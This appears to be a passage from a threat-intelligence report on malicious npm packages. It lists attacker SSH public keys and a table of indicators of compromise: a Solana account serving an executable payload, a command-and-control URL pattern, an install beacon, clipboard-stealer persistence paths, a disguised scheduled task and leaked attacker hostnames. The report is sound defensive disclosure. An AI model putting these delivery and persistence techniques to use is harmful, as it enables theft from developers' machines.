ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDkLsr0i9Y+wkw8u3HefyHwyzn+kEni7cQ3ozNucJFYYBkZCv6Jj/p0Lm+RSBdPCPt6gvhkccoJyJCO9o8pw0dKlrLKkQiOYQWtDAgFJq5Hb+CgtlI3GYPT9HMtfrDWFhEJQ/gcenTNCmA6dptKCJTFnaySNE/CBTLcQR7o1l4AeX1ZV96zZ6VhHy0gC8ZjvHKfozgQlEXuAxTlIPmk7XJ0q9BnL1gjucr2vuj9mngYDYXueyucJJ4ypfCRiSVet3pLx530vszgqDxQb78lZGpUtKT5eTJwYQ2jeoBX2zbeskywQvc0I9wZLzapEblfJCaR3xQnVn+kViY5z7hJNEb6JbqT2wo2jIMhuSMcFAsYhYQ6TLLqko3gn3LfnL9K0ZRodRT+NEM8My/Q0+r1TasfJ2r4nd11uf0p96mn+DrECdSOfn/28hwi1xJ8atUcfUD5HsLFfhzKiMdYDO4Uv0eGi3Y6sQSmvyA/f7Xduegj6LucrErzOpZx7/fbTvIDKFRCI68xtDosmz9bsbAsq+5g8lynx5qng+QLLcvj0d8r1BM+7uOVuqAGaLJkTrCmcb+ko/hQMicsCWxXQfz3c+9kKMODY3zO0Ndw9hdm+dI3cuuqpgPVClydr1CGohEK6Cv+7CPxKGl8PbSP67gxkPkmCKBS6u7DSAVPQu1FK9t8Cw== user@DESKTOP-VFF5DKR

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDkLsr0i9Y+wkw8u3HefyHwyzn+kEni7cQ3ozNucJFYYBkZCv6Jj/p0Lm+RSBdPCPt6gvhkccoJyJCO9o8pw0dKlrLKkQiOYQWtDAgFJq5Hb+CgtlI3GYPT9HMtfrDWFhEJQ/gcenTNCmA6dptKCJTFnaySNE/CBTLcQR7o1l4AeX1ZV96zZ6VhHy0gC8ZjvHKfozgQlEXuAxTlIPmk7XJ0q9BnL1gjucr2vuj9mngYDYXueyucJJ4ypfCRiSVet3pLx530vszgqDxQb78lZGpUtKT5eTJwYQ2jeoBX2zbeskywQvc0I9wZLzapEblfJCaR3xQnVn+kViY5z7hJNEb6JbqT2wo2jIMhuSMcFAsYhYQ6TLLqko3gn3LfnL9K0ZRodRT+NEM8My/Q0+r1TasfJ2r4nd11uf0p96mn+DrECdSOfn/28hwi1xJ8atUcfUD5HsLFfhzKiMdYDO4Uv0eGi3Y6sQSmvyA/f7Xduegj6LucrErzOpZx7/fbTvIDKFRCI68xtDosmz9bsbAsq+5g8lynx5qng+QLLcvj0d8r1BM+7uOVuqAGaLJkTrCmcb+ko/hQMicsCWxXQfz3c+9kKMODY3zO0Ndw9hdm+dI3cuuqpgPVClydr1CGohEK6Cv+7CPxKGl8PbSP67gxkPkmCKBS6u7DSAVPQu1FK9t8Cw== user@DESKTOP-VFF5DKR

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDkLsr0i9Y+wkw8u3HefyHwyzn+kEni7cQ3ozNucJFYYBkZCv6Jj/p0Lm+RSBdPCPt6gvhkccoJyJCO9o8pw0dKlrLKkQiOYQWtDAgFJq5Hb+CgtlI3GYPT9HMtfrDWFhEJQ/gcenTNCmA6dptKCJTFnaySNE/CBTLcQR7o1l4AeX1ZV96zZ6VhHy0gC8ZjvHKfozgQlEXuAxTlIPmk7XJ0q9BnL1gjucr2vuj9mngYDYXueyucJJ4ypfCRiSVet3pLx530vszgqDxQb78lZGpUtKT5eTJwYQ2jeoBX2zbeskywQvc0I9wZLzapEblfJCaR3xQnVn+kViY5z7hJNEb6JbqT2wo2jIMhuSMcFAsYhYQ6TLLqko3gn3LfnL9K0ZRodRT+NEM8My/Q0+r1TasfJ2r4nd11uf0p96mn+DrECdSOfn/28hwi1xJ8atUcfUD5HsLFfhzKiMdYDO4Uv0eGi3Y6sQSmvyA/f7Xduegj6LucrErzOpZx7/fbTvIDKFRCI68xtDosmz9bsbAsq+5g8lynx5qng+QLLcvj0d8r1BM+7uOVuqAGaLJkTrCmcb+ko/hQMicsCWxXQfz3c+9kKMODY3zO0Ndw9hdm+dI3cuuqpgPVClydr1CGohEK6Cv+7CPxKGl8PbSP67gxkPkmCKBS6u7DSAVPQu1FK9t8Cw== user@DESKTOP-VFF5DKR

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDkLsr0i9Y+wkw8u3HefyHwyzn+kEni7cQ3ozNucJFYYBkZCv6Jj/p0Lm+RSBdPCPt6gvhkccoJyJCO9o8pw0dKlrLKkQiOYQWtDAgFJq5Hb+CgtlI3GYPT9HMtfrDWFhEJQ/gcenTNCmA6dptKCJTFnaySNE/CBTLcQR7o1l4AeX1ZV96zZ6VhHy0gC8ZjvHKfozgQlEXuAxTlIPmk7XJ0q9BnL1gjucr2vuj9mngYDYXueyucJJ4ypfCRiSVet3pLx530vszgqDxQb78lZGpUtKT5eTJwYQ2jeoBX2zbeskywQvc0I9wZLzapEblfJCaR3xQnVn+kViY5z7hJNEb6JbqT2wo2jIMhuSMcFAsYhYQ6TLLqko3gn3LfnL9K0ZRodRT+NEM8My/Q0+r1TasfJ2r4nd11uf0p96mn+DrECdSOfn/28hwi1xJ8atUcfUD5HsLFfhzKiMdYDO4Uv0eGi3Y6sQSmvyA/f7Xduegj6LucrErzOpZx7/fbTvIDKFRCI68xtDosmz9bsbAsq+5g8lynx5qng+QLLcvj0d8r1BM+7uOVuqAGaLJkTrCmcb+ko/hQMicsCWxXQfz3c+9kKMODY3zO0Ndw9hdm+dI3cuuqpgPVClydr1CGohEK6Cv+7CPxKGl8PbSP67gxkPkmCKBS6u7DSAVPQu1FK9t8Cw== user@DESKTOP-VFF5DKR

Key 6, npm_kei (pretty-pino-logger):

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDD/aq+GggFagz6OiNUOulFCbBj4ACXaGYIMSNzVokw/MATrzI5poBoyULdqjfeCOqgkhG4BIlnE5im2CqBzjpD3lZ7WBUoBJEf2tdzsojMx2U6s8VNnO8o54EowStpTLMoSTVbfCw3pECZMlnn3uBR+yV/LTPk2LbJjgozHWoLjXd0dMuWpxOARqpxPZhvaglJY6qNQ31F0I+UwxonbLXsqGNhaBllm1zi6FFOEYXbdNAS9yLhAEh2h7HlR9B6vVTdRLmGar9vsDaLAtV56ij2cOS67rRNLjAnRUl7C37FvG/kAJgkm82I2aJ3wZE4Q98qv2OnZdZi+nh+jkeTPJn3n6Kfu/QWL78CdQZp31TYPledaqY+mvsvIhTJEZ4LfLBZdL+T5orUSf6Oqo1U/tuudlUIi6UjtOdEukJ0aLc0W7dx6gOY0AYihCF7yBIhl8jGIaUlUL6W2byMi2bDIOcAhv/OzvmRZyT256gD3cMu0r7K2OPx59Ta1/dlE/iNHjMm+tukYcMTZQkkPOZae73fPUfvM1C+CQQQUsf37qjNl2X94nRjCYh3P2IHnQeEeP3e57MiD2a05zGqtwY0Beqg0tnkgdIoMcoGngIRCuLPsYi3j6zdSksWidbboJpLTwb1wJN/58Tzrt015riHnlI+/LqryzFiuCUKQUg1/2Dzmw

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDD/aq+GggFagz6OiNUOulFCbBj4ACXaGYIMSNzVokw/MATrzI5poBoyULdqjfeCOqgkhG4BIlnE5im2CqBzjpD3lZ7WBUoBJEf2tdzsojMx2U6s8VNnO8o54EowStpTLMoSTVbfCw3pECZMlnn3uBR+yV/LTPk2LbJjgozHWoLjXd0dMuWpxOARqpxPZhvaglJY6qNQ31F0I+UwxonbLXsqGNhaBllm1zi6FFOEYXbdNAS9yLhAEh2h7HlR9B6vVTdRLmGar9vsDaLAtV56ij2cOS67rRNLjAnRUl7C37FvG/kAJgkm82I2aJ3wZE4Q98qv2OnZdZi+nh+jkeTPJn3n6Kfu/QWL78CdQZp31TYPledaqY+mvsvIhTJEZ4LfLBZdL+T5orUSf6Oqo1U/tuudlUIi6UjtOdEukJ0aLc0W7dx6gOY0AYihCF7yBIhl8jGIaUlUL6W2byMi2bDIOcAhv/OzvmRZyT256gD3cMu0r7K2OPx59Ta1/dlE/iNHjMm+tukYcMTZQkkPOZae73fPUfvM1C+CQQQUsf37qjNl2X94nRjCYh3P2IHnQeEeP3e57MiD2a05zGqtwY0Beqg0tnkgdIoMcoGngIRCuLPsYi3j6zdSksWidbboJpLTwb1wJN/58Tzrt015riHnlI+/LqryzFiuCUKQUg1/2Dzmw

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDD/aq+GggFagz6OiNUOulFCbBj4ACXaGYIMSNzVokw/MATrzI5poBoyULdqjfeCOqgkhG4BIlnE5im2CqBzjpD3lZ7WBUoBJEf2tdzsojMx2U6s8VNnO8o54EowStpTLMoSTVbfCw3pECZMlnn3uBR+yV/LTPk2LbJjgozHWoLjXd0dMuWpxOARqpxPZhvaglJY6qNQ31F0I+UwxonbLXsqGNhaBllm1zi6FFOEYXbdNAS9yLhAEh2h7HlR9B6vVTdRLmGar9vsDaLAtV56ij2cOS67rRNLjAnRUl7C37FvG/kAJgkm82I2aJ3wZE4Q98qv2OnZdZi+nh+jkeTPJn3n6Kfu/QWL78CdQZp31TYPledaqY+mvsvIhTJEZ4LfLBZdL+T5orUSf6Oqo1U/tuudlUIi6UjtOdEukJ0aLc0W7dx6gOY0AYihCF7yBIhl8jGIaUlUL6W2byMi2bDIOcAhv/OzvmRZyT256gD3cMu0r7K2OPx59Ta1/dlE/iNHjMm+tukYcMTZQkkPOZae73fPUfvM1C+CQQQUsf37qjNl2X94nRjCYh3P2IHnQeEeP3e57MiD2a05zGqtwY0Beqg0tnkgdIoMcoGngIRCuLPsYi3j6zdSksWidbboJpLTwb1wJN/58Tzrt015riHnlI+/LqryzFiuCUKQUg1/2Dzmw

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDD/aq+GggFagz6OiNUOulFCbBj4ACXaGYIMSNzVokw/MATrzI5poBoyULdqjfeCOqgkhG4BIlnE5im2CqBzjpD3lZ7WBUoBJEf2tdzsojMx2U6s8VNnO8o54EowStpTLMoSTVbfCw3pECZMlnn3uBR+yV/LTPk2LbJjgozHWoLjXd0dMuWpxOARqpxPZhvaglJY6qNQ31F0I+UwxonbLXsqGNhaBllm1zi6FFOEYXbdNAS9yLhAEh2h7HlR9B6vVTdRLmGar9vsDaLAtV56ij2cOS67rRNLjAnRUl7C37FvG/kAJgkm82I2aJ3wZE4Q98qv2OnZdZi+nh+jkeTPJn3n6Kfu/QWL78CdQZp31TYPledaqY+mvsvIhTJEZ4LfLBZdL+T5orUSf6Oqo1U/tuudlUIi6UjtOdEukJ0aLc0W7dx6gOY0AYihCF7yBIhl8jGIaUlUL6W2byMi2bDIOcAhv/OzvmRZyT256gD3cMu0r7K2OPx59Ta1/dlE/iNHjMm+tukYcMTZQkkPOZae73fPUfvM1C+CQQQUsf37qjNl2X94nRjCYh3P2IHnQeEeP3e57MiD2a05zGqtwY0Beqg0tnkgdIoMcoGngIRCuLPsYi3j6zdSksWidbboJpLTwb1wJN/58Tzrt015riHnlI+/LqryzFiuCUKQUg1/2Dzmw

Additional IOCs

IOC	Type	Notes
4WF8QCFEnVD7BLs3QAVe2SjxRZ4n3EboCsdhj363VAqZ	Solana devnet account	Used by st-bigintr (`a.n.n.as.ibal2.36`) to store and serve executable payload via getAccountInfo RPC. Payload decoded from base64 and executed via new Function().
polymarkeths[@]gmail[.]com	Email	Embedded in lorine93s SSH Key 2 comment, not an npm account
DESKTOP-EDKDDLL	Windows hostname	Leaked in npmpodev0707 SSH key, links to devking1616
DESKTOP-VFF5DKR	Windows hostname	Leaked in soju_dev SSH key
/api/validate/*	URL path pattern	Universal C2 endpoint across all PromptMink actors
{"text": "installed"}	Beacon payload	ClipViper install-time victim tracking
`%LOCALAPPDATA%\prettier-lint\cdll.mjs`	ClipViper persistence	Clipboard stealer payload
`%LOCALAPPDATA%\prettier-lint\ctll.mjs`	ClipViper persistence	Dropper payload
`%LOCALAPPDATA%\prettier-lint\cdll.xml`	ClipViper persistence	Task configuration
`%LOCALAPPDATA%\prettier-lint\cdll-run-hidden.vbs`	ClipViper persistence	VBScript launcher, suppresses console
`%USERPROFILE%\.cdll-clipboard-worker.lock`	ClipViper persistence	Instance lockfile
CdllProtect	ClipViper persistence	Scheduled task, mimics system service
`C:\Users\Administrator\Documents\0x0-github\data_service\node\pip-ai\pip-lint`	OPSEC artifact	Attacker dev path in cdll-run-hidden.vbs, identical in api-ts-utils + prettier-resolver
`C:\nvm4w\nodejs\node.exe`	OPSEC artifact	Attacker Node.js install path
pip-lint	OPSEC artifact	Original project name before rename to prettier-lint
0x0-github	OPSEC artifact	Attacker GitHub workspace directory
DESKTOP-4TO2VRJ	Windows hostname	Leaked in pretty-pino-logger